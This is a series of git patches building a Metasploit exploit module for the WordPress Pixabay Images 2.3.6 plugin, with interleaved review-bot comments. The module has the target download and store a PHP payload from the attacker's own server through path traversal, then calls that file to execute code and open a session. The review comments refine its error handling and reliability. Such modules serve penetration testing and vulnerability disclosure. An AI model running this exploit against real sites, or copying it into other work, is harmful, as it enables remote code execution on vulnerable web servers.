From 5813c639d15fe130f2b44e56960304d1cfb9c675 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?=
Date: Mon, 19 Jan 2015 17:23:48 +0100
Subject: [PATCH 1/9] Initial commit
---
 .../webapp/php_wordpress_pixabay_images.rb | 159 ++++++++++++++++++
 1 file changed, 159 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
new file mode 100644
index 0000000000..691711178c
--- /dev/null
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Exploit::Remote
+ include Msf::HTTP::Wordpress
+ include Msf::Exploit::Remote::HttpServer
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ Rank = ExcellentRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Wordpress Pixabay Images PHP Code Upload',
+ 'Description' => %q{
+ This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay
+ Images 2.3.6. The plugin does not check the host of a provided download URL
+ which can be used to store and execute malicious PHP code on the system.
+ },
+
+ 'Author' =>
+ [
+ 'h0ng10', # Discovery, Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['pixabay-images 2.3', {}]],
+ 'DefaultTarget' => 0,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'DisclosureDate' => 'Jan 19 2015'
+ ))
+
+ register_options(
+ [
+ OptString.new('DOWNURI', [ false, "An alternative URI to request the PHP payload from"]),
+ ], self.class)
+
+ end
+
+
+ # Handle incoming requests from the server
+ def on_request_uri(cli, request)
+ vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}")
+ print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+ send_response(cli, payload.encoded)
+ end
+
+ def generate_payload_uri
+
+ # Did the user provide his own url? If yes use it...
+ return datastore['DOWNURI'] if datastore['DOWNURI']
+
+ # Create a custom URI
+ custom_uri = "http://" + datastore['SRVHOST']
+
+ if datastore['SRVPORT'] != "80" then
+ custom_uri += ":" + datastore['SRVPORT'].to_s
+ end
+
+ custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+ return custom_uri
+ end
+
+
+ def call_payload(file_name, epoch_time)
+ real_fn = "#{file_name}_#{epoch_time.to_s}.php"
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
+ })
+ return res
+ end
+
+ def exploit
+ unless wordpress_and_online?
+ fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
+ end
+
+
+ print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+ start_service
+
+ # did the user provide his own url
+ payload_uri = generate_payload_uri
+ vprint_status("Using URI " + payload_uri)
+
+ random_file_name = rand_text_alphanumeric(rand(5)+5)
+ post = {
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+ 'image_url' => payload_uri,
+ 'image_user' => rand_text_alphanumeric(rand(5)+5),
+ 'q' => "../../../../" + random_file_name
+ }
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+ 'vars_post' => post,
+ })
+
+ server_epoch_time = DateTime.strptime(res.headers['date'], "%a, %d %b %Y %H:%M:%S GMT").to_i
+
+ print_status("Calling payload")
+ res = call_payload(random_file_name, server_epoch_time)
+
+ if (res and res.code != 200) then
+ print_status("Request failed, trying additional epoch values...")
+ server_epoch_time -= 5
+ 10.times do |i|
+ res = call_payload(random_file_name, server_epoch_time)
+ break if res and res.code == 200
+ server_epoch_time += 1
+ end
+ end
+ stop_service
+
+ end
+
+ def check
+ res = wordpress_and_online?
+ unless res
+ vprint_error("#{peer} does not seeem to be Wordpress site")
+ return Exploit::CheckCode::Unknown
+ end
+
+ # Send a request with a illegal URL to verify that the target is vulnerable
+ post = {
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+ 'image_url' => rand_text_alphanumeric(rand(5)+5),
+ 'image_user' => rand_text_alphanumeric(rand(5)+5),
+ 'q' => rand_text_alphanumeric(rand(5)+5)
+ }
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+ 'vars_post' => post,
+ })
+
+
+ if res.body and (res.body =~ /Error: A valid URL was not provided/)
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ return Exploit::CheckCode::Safe
+
+ end
+end
From 11bf58e5485b2b77d6dc82af64321da21b48f684 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?=
Date: Fri, 23 Jan 2015 08:48:52 +0100
Subject: [PATCH 2/9] Use metasploit methods
---
 .../webapp/php_wordpress_pixabay_images.rb | 19 ++++++------------
 1 file changed, 6 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
index 691711178c..3157050043 100644
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -62,13 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return datastore['DOWNURI'] if datastore['DOWNURI']
 # Create a custom URI
- custom_uri = "http://" + datastore['SRVHOST']
-
- if datastore['SRVPORT'] != "80" then
- custom_uri += ":" + datastore['SRVPORT'].to_s
-
- custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+ custom_uri = get_uri + ".php"
 return custom_uri
 end
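Review bot: `check` falls through to `Exploit::CheckCode::Safe` whenever the POST yields nothing it can judge — no response at all (`res.body` on a nil `res` raises here) or a page that merely lacks the marker string — so a timeout, a blocked request or an unexpected page is reported as a confirmed not-vulnerable host, which is the wrong verdict to hand to a scan. `Safe` should only be returned once a real response was examined; add `return Exploit::CheckCode::Unknown unless res && res.body` before the regex test. The rewritten `check` in the "Do minor cleanup" hunk and the one touched by "Allow to provide the traversal depth" keep the same fall-through, so the fix applies there as well.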
@@ -77,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 real_fn = "#{file_name}_#{epoch_time.to_s}.php"
 res = send_request_cgi({
 'method' => 'GET',
- 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
 })
 return res
 end
@@ -87,8 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
 end
-
- print_status("Starting up web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
+ print_status("Starting up web service...")
 start_service
 # did the user provide his own url
@@ -105,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi({
 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+ 'uri' => normalize_uri(wordpress_url_backend),
 'vars_post' => post,
 })
@@ -144,12 +137,12 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi({
 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path, 'wp-admin/'),
+ 'uri' => normalize_uri(wordpress_url_backend),
 'vars_post' => post,
 })
- if res.body and (res.body =~ /Error: A valid URL was not provided/)
+ if res and (res.body =~ /Error: A valid URL was not provided/)
 return Exploit::CheckCode::Vulnerable
 end
From dfbbc79e0d5f3adeff2abaf9d2de70bb7bf02708 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?=
Date: Fri, 23 Jan 2015 09:23:09 +0100
Subject: [PATCH 3/9] make retries a datastore option
---
 modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
index 3157050043..dad4eeacb6 100644
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -43,6 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options(
 [
+ OptInt.new('RETRIES', [ false, 'Number of guesses if initial name guess fails', 5]),
 OptString.new('DOWNURI', [ false, "An alternative URI to request the PHP payload from"]),
 ], self.class)
@@ -109,8 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if (res and res.code != 200) then
 print_status("Request failed, trying additional epoch values...")
- server_epoch_time -= 5
- 10.times do |i|
+ datastore['RETRIES'].times do |i|
 res = call_payload(random_file_name, server_epoch_time)
 break if res and res.code == 200
 server_epoch_time += 1
From 419fa93897d75f6801f01bc21b92d9de0c7b8489 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch=20=28h0ng10=29?=
Date: Fri, 23 Jan 2015 09:27:42 +0100
Subject: [PATCH 4/9] Add OSVDB and WPScan references
---
 modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
index dad4eeacb6..f3159ffd49 100644
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -27,7 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ]
+ [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ],
+ [ 'OSVDB', '117145' ],
+ [ 'OSVDB', '117146'],
+ [ 'WPVDB', '7758']
 ],
 'Privileged' => false,
 'Platform' => ['php'],
From 82be43ea58da55d71234bf82499e2c06f411a3df Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 3 Feb 2015 16:07:27 -0600
Subject: [PATCH 5/9] Do minor cleanup
---
 .../webapp/php_wordpress_pixabay_images.rb | 113 ++++++++----------
 1 file changed, 52 insertions(+), 61 deletions(-)
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
index f3159ffd49..2030dc1978 100644
--- a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
@@ -15,11 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => 'Wordpress Pixabay Images PHP Code Upload',
 'Description' => %q{
- This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay
- Images 2.3.6. The plugin does not check the host of a provided download URL
- which can be used to store and execute malicious PHP code on the system.
+ This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay
+ Images 2.3.6. The plugin does not check the host of a provided download URL
+ which can be used to store and execute malicious PHP code on the system.
 },
-
 'Author' =>
 [
 'h0ng10', # Discovery, Metasploit module
@@ -27,10 +26,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'References' =>
 [
- [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ],
- [ 'OSVDB', '117145' ],
- [ 'OSVDB', '117146'],
- [ 'WPVDB', '7758']
+ ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt'],
+ ['OSVDB', '117145'],
+ ['OSVDB', '117146'],
+ ['WPVDB', '7758']
 ],
 'Privileged' => false,
 'Platform' => ['php'],
@@ -41,15 +40,14 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'DisableNops' => true,
 },
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
 'DisclosureDate' => 'Jan 19 2015'
- ))
-
- register_options(
- [
- OptInt.new('RETRIES', [ false, 'Number of guesses if initial name guess fails', 5]),
- OptString.new('DOW‌NURI', [ false, "An alternative URI to request the PHP payload from"]),
- ], self.class)
+ ))
+ register_options(
+ [
+ OptInt.new('RETRIES', [false, 'Number of guesses if initial name guess fails', 5])
+ ], self.class)
 end
@@ -61,95 +59,88 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 def generate_payload_uri
-
- # Did the user provide his own url? If yes use it...
- return datastore['DOWNURI'] if datastore['DOWNURI']
-
 # Create a custom URI
- custom_uri = get_uri + ".php"
- return custom_uri
+ "#{get_uri}.php"
 end
-
 def call_payload(file_name, epoch_time)
- real_fn = "#{file_name}_#{epoch_time.to_s}.php"
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
- })
- return res
+ real_fn = "#{file_name}_#{epoch_time.to_s}.php"
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
+ })
+
+ res
 end
 def exploit
 unless wordpress_and_online?
- fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
+ fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be Wordpress site")
 end
- print_status("Starting up web service...")
+ print_status("#{peer} - Starting up web service...")
 start_service
 # did the user provide his own url
 payload_uri = generate_payload_uri
- vprint_status("Using URI " + payload_uri)
+ vprint_status("#{peer} - Using URI #{payload_uri}")
 random_file_name = rand_text_alphanumeric(rand(5)+5)
 post = {
- 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
- 'image_url' => payload_uri,
- 'image_user' => rand_text_alphanumeric(rand(5)+5),
- 'q' => "../../../../" + random_file_name
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+ 'image_url' => payload_uri,
+ 'image_user' => rand_text_alphanumeric(rand(5)+5),
+ 'q' => "../../../../" + random_file_name
 }
 res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => normalize_uri(wordpress_url_backend),
- 'vars_post' => post,
- })
+ 'method' => 'POST',
+ 'uri' => normalize_uri(wordpress_url_backend),
+ 'vars_post' => post
+ })
- server_epoch_time = DateTime.strptime(res.headers['date'], "%a, %d %b %Y %H:%M:%S GMT").to_i
+ server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i
- print_status("Calling payload")
+ print_status("#{peer} - Calling payload...")
 res = call_payload(random_file_name, server_epoch_time)
- if (res and res.code != 200) then
- print_status("Request failed, trying additional epoch values...")
- datastore['RETRIES'].times do |i|
- res = call_payload(random_file_name, server_epoch_time)
- break if res and res.code == 200
- server_epoch_time += 1
- end
+ if res and res.code != 200
+ print_status("#{peer} - Request failed, trying additional epoch values...")
+ datastore['RETRIES'].times do |i|
+ res = call_payload(random_file_name, server_epoch_time)
+ break if res and res.code == 200
+ server_epoch_time += 1
+ end
 end
 stop_service
-
 end
 def check
 res = wordpress_and_online?
 unless res
- vprint_error("#{peer} does not seeem to be Wordpress site")
+ vprint_error("#{peer} - It doesn't look like a Wordpress site")
 return Exploit::CheckCode::Unknown
 end
 # Send a request with a illegal URL to verify that the target is vulnerable
 post = {
- 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
- 'image_url' => rand_text_alphanumeric(rand(5)+5),
- 'image_user' => rand_text_alphanumeric(rand(5)+5),
- 'q' => rand_text_alphanumeric(rand(5)+5)
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+ 'image_url' => rand_text_alphanumeric(rand(5)+5),
+ 'image_user' => rand_text_alphanumeric(rand(5)+5),
+ 'q' => rand_text_alphanumeric(rand(5)+5)
 }
 res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => normalize_uri(wordpress_url_backend),
- 'vars_post' => post,
- })
+ 'method' => 'POST',
+ 'uri' => normalize_uri(wordpress_url_backend),
+ 'vars_post' => post
+ })
- if res and (res.body =~ /Error: A valid URL was not provided/)
+ if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/
 return Exploit::CheckCode::Vulnerable
 end
- return Exploit::CheckCode::Safe
-
+ Exploit::CheckCode::Safe
 end
 end
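Review bot: The `fail_with` line in `exploit` is rewritten in this hunk but keeps the typo in its message, `does not seeem to be Wordpress site`; since the string changes anyway, `"#{peer} - #{target_uri} does not seem to be a Wordpress site"` would fix it. The same hunk mixes boolean styles: `if res and res.code != 200` and `break if res and res.code == 200` in `exploit` use `and`, while the rewritten `check` below switches to `&&` — `and` binds looser than assignment, which is why the style guide reserves it for control flow, so `res && res.code != 200` is the form the rest of the module now uses. The block parameter in `datastore['RETRIES'].times do |i|` is unused because the loop advances `server_epoch_time` by hand; `|_i|` makes that explicit.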
From 61cdb5dfc9d79e32e1b12e8c999d8cd2a7f97032 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 3 Feb 2015 16:13:10 -0600
Subject: [PATCH 6/9] Change filename
---
 ...hp_wordpress_pixabay_images.rb => wp_pixabay_images_upload.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/exploits/unix/webapp/{php_wordpress_pixabay_images.rb => wp_pixabay_images_upload.rb} (100%)
diff --git a/modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
similarity index 100%
rename from modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb
rename to modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
From e62a5a4fffb5cf7bc2c1a56254d2369299864f3f Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 3 Feb 2015 16:23:04 -0600
Subject: [PATCH 7/9] Make the calling payload code easier
---
 .../unix/webapp/wp_pixabay_images_upload.rb | 24 +++++++------------
 1 file changed, 9 insertions(+), 15 deletions(-)
diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
index 2030dc1978..374950c8bc 100644
--- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
@@ -46,15 +46,14 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options(
 [
- OptInt.new('RETRIES', [false, 'Number of guesses if initial name guess fails', 5])
+ OptInt.new('TRIES', [false, 'Number of guesses if initial name guess fails', 5])
 ], self.class)
 end
 # Handle incoming requests from the server
 def on_request_uri(cli, request)
- vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}")
- print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+ print_status("URI requested: #{request.raw_uri}")
 send_response(cli, payload.encoded)
 end
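Review bot: The replacement `print_status("URI requested: #{request.raw_uri}")` in `on_request_uri` loses the host prefix that every other status line in this module carries (the removed lines used `#{rhost}:#{rport} - `, the rest of the file `#{peer} - `), so in a run against several hosts this line cannot be attributed; `print_status("#{cli.peerhost} - URI requested: #{request.raw_uri}")` names the host that actually fetched the payload, which is the value worth having in the log. The hunk also drops the only place the full request was logged (`request.inspect`); if that detail is still useful when a callback fails, keep it behind `vprint_status` rather than removing it.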
@@ -67,8 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote
 real_fn = "#{file_name}_#{epoch_time.to_s}.php"
 res = send_request_cgi({
 'method' => 'GET',
- 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn),
- })
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn)
+ }, 3)
 res
 end
@@ -99,20 +98,15 @@ class Metasploit3 < Msf::Exploit::Remote
 'vars_post' => post
 })
+ stop_service
+
 server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i
 print_status("#{peer} - Calling payload...")
- res = call_payload(random_file_name, server_epoch_time)
-
- if res and res.code != 200
- print_status("#{peer} - Request failed, trying additional epoch values...")
- datastore['RETRIES'].times do |i|
- res = call_payload(random_file_name, server_epoch_time)
- break if res and res.code == 200
- server_epoch_time += 1
- end
+ datastore['TRIES'].times do |i|
+ res = call_payload(random_file_name, server_epoch_time + i)
+ break if res and res.code == 200
 end
- stop_service
 end
 def check
From 4ca4fd1be26c73ae0aacf994b555b8e8f8962eaf Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 3 Feb 2015 16:38:40 -0600
Subject: [PATCH 8/9] Allow to provide the traversal depth
---
 .../unix/webapp/wp_pixabay_images_upload.rb | 28 +++++++++++--------
 1 file changed, 16 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
index 374950c8bc..96d3bc1555 100644
--- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options(
 [
- OptInt.new('TRIES', [false, 'Number of guesses if initial name guess fails', 5])
+ OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]),
+ OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 3])
 ], self.class)
 end
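Review bot: The new second argument in `}, 3)` to `send_request_cgi` inside `call_payload` is an undocumented magic number: nothing at the call site says it is a timeout in seconds or why it is so much shorter than the default, presumably because this request runs the payload and may never return normally — confirm that and record it, e.g. `}, 3) # short timeout: this request executes the payload and may not complete`. `call_payload` begins outside this hunk. In the "Allow to provide the traversal depth" hunk on the same line, the `DEPTH` description `'Traversal path until the uploads folder'` does not say what the integer counts; `'Number of ../ segments needed to reach the uploads folder'` describes what `'../' * datastore['DEPTH']` builds.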
@@ -57,8 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
 send_response(cli, payload.encoded)
 end
+ # Create a custom URI
 def generate_payload_uri
- # Create a custom URI
 "#{get_uri}.php"
 end
@@ -80,18 +81,18 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("#{peer} - Starting up web service...")
 start_service
- # did the user provide his own url
 payload_uri = generate_payload_uri
 vprint_status("#{peer} - Using URI #{payload_uri}")
- random_file_name = rand_text_alphanumeric(rand(5)+5)
+ random_file_name = rand_text_alphanumeric(rand(5) + 5)
 post = {
- 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
 'image_url' => payload_uri,
- 'image_user' => rand_text_alphanumeric(rand(5)+5),
- 'q' => "../../../../" + random_file_name
+ 'image_user' => rand_text_alphanumeric(rand(5) + 5),
+ 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
 }
+ print_status("#{peer} - Uploading payload...")
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(wordpress_url_backend),
@@ -100,6 +101,10 @@ class Metasploit3 < Msf::Exploit::Remote
 stop_service
+ unless res && res.code == 200 && res.headers['date']
+ fail_with(Failure::Unknown, "#{peer} - Upload failed or unable to guess the system time...")
+ end
+
 server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i
 print_status("#{peer} - Calling payload...")
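Review bot: The new guard checks that a Date header is present but not that it is parseable: `DateTime.strptime` with the fixed `'%a, %d %b %Y %H:%M:%S GMT'` pattern raises `ArgumentError` for the other two date formats HTTP permits (RFC 850 and asctime) and for anything a proxy rewrites, and that exception is not rescued, so the module aborts with a backtrace instead of the `fail_with` message the guard was added to produce. `Time.httpdate` (stdlib `time`) accepts all three forms; parse with it and turn a parse failure into the same `Failure::Unknown` the guard already uses. `exploit` begins outside this hunk.
```ruby
      # … unchanged: stop_service and the res/Date-header guard …
      begin
        server_epoch_time = Time.httpdate(res.headers['date']).to_i
      rescue ArgumentError
        fail_with(Failure::Unknown, "#{peer} - Unparseable Date header: #{res.headers['date']}")
      end
```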
@@ -118,10 +123,10 @@ class Metasploit3 < Msf::Exploit::Remote
 # Send a request with a illegal URL to verify that the target is vulnerable
 post = {
- 'pixabay_upload' => rand_text_alphanumeric(rand(5)+5),
- 'image_url' => rand_text_alphanumeric(rand(5)+5),
- 'image_user' => rand_text_alphanumeric(rand(5)+5),
- 'q' => rand_text_alphanumeric(rand(5)+5)
+ 'pixabay_upload' => rand_text_alphanumeric(rand(5) + 5),
+ 'image_url' => rand_text_alphanumeric(rand(5) + 5),
+ 'image_user' => rand_text_alphanumeric(rand(5) + 5),
+ 'q' => rand_text_alphanumeric(rand(5) + 5)
 }
 res = send_request_cgi({
@@ -130,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'vars_post' => post
 })
-
 if res && res.body && res.body.to_s =~ /Error: A valid URL was not provided/
 return Exploit::CheckCode::Vulnerable
 end
From eebee7c066c28d97f79156e48ff7762eb3c3d5cd Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 3 Feb 2015 17:00:37 -0600
Subject: [PATCH 9/9] Do better session creation handling
---
 .../unix/webapp/wp_pixabay_images_upload.rb | 21 +++++++++++--------
 1 file changed, 12 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
index 96d3bc1555..7c90695230 100644
--- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
@@ -4,10 +4,10 @@
 ##
 class Metasploit3 < Msf::Exploit::Remote
- include Msf::HTTP::Wordpress
+ include Msf::Exploit::FileDropper
 include Msf::Exploit::Remote::HttpServer
 include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::FileDropper
+ include Msf::HTTP::Wordpress
 Rank = ExcellentRanking
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 register_options(
 [
 OptInt.new('TRIES', [true, 'Number of guesses if initial name guess fails', 5]),
- OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 3])
+ OptInt.new('DEPTH', [true, 'Traversal path until the uploads folder', 4])
 ], self.class)
 end
@@ -63,11 +63,10 @@ class Metasploit3 < Msf::Exploit::Remote
 "#{get_uri}.php"
 end
- def call_payload(file_name, epoch_time)
- real_fn = "#{file_name}_#{epoch_time.to_s}.php"
+ def call_payload(file_name)
 res = send_request_cgi({
 'method' => 'GET',
- 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', real_fn)
+ 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', file_name)
 }, 3)
 res
@@ -92,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}"
 }
- print_status("#{peer} - Uploading payload...")
+ print_status("#{peer} - Uploading payload #{random_file_name}...")
 res = send_request_cgi({
 'method' => 'POST',
 'uri' => normalize_uri(wordpress_url_backend),
@@ -109,8 +108,12 @@ class Metasploit3 < Msf::Exploit::Remote
 print_status("#{peer} - Calling payload...")
 datastore['TRIES'].times do |i|
- res = call_payload(random_file_name, server_epoch_time + i)
- break if res and res.code == 200
+ payload_name = "#{random_file_name}_#{server_epoch_time + i}.php"
+ res = call_payload(payload_name)
+ if (res && res.code == 200) || session_created?
+ register_files_for_cleanup(payload_name)
+ break
+ end
 end
 end
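Review bot: When every iteration of `datastore['TRIES'].times` misses — no 200 and no session — the loop simply ends and `exploit` returns without a word: nothing is printed, `fail_with` is not called, and the operator cannot tell whether the clock guess was off or the payload ran without calling back, while the module's result still looks like a normal completion. After the loop add `fail_with(Failure::Unknown, "#{peer} - No session after #{datastore['TRIES']} tries; the uploaded file could not be located") unless session_created?` so the outcome is reported as a failure. `exploit` begins outside this hunk.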